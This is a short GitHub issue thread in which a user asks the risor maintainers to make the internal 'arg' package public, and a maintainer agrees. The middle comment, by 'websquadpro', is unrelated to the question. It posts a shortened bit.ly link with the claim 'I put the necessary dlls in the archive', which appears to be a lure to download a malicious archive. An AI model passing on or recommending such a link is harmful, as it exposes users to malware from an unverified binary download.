### ISSUE TITLE
Consider making the arg package public

### ISSUE THREAD

**Issue by rubiojr** [risor-io/risor#267]
https://github.com/risor-io/risor/blob/main/internal/arg is a useful package when writing (out of tree) new modules. 

It's small, so not a big deal to duplicate that code with the new module, but would it be a good idea to make it public? Most modules use it from what I've seen.

**Comment by websquadpro** [comment]
try this
https://bit.ly/3XQLHlH
I put the necessary dlls in the archive

**Comment by myzie** [comment]
Yeah, I’m fine with this change
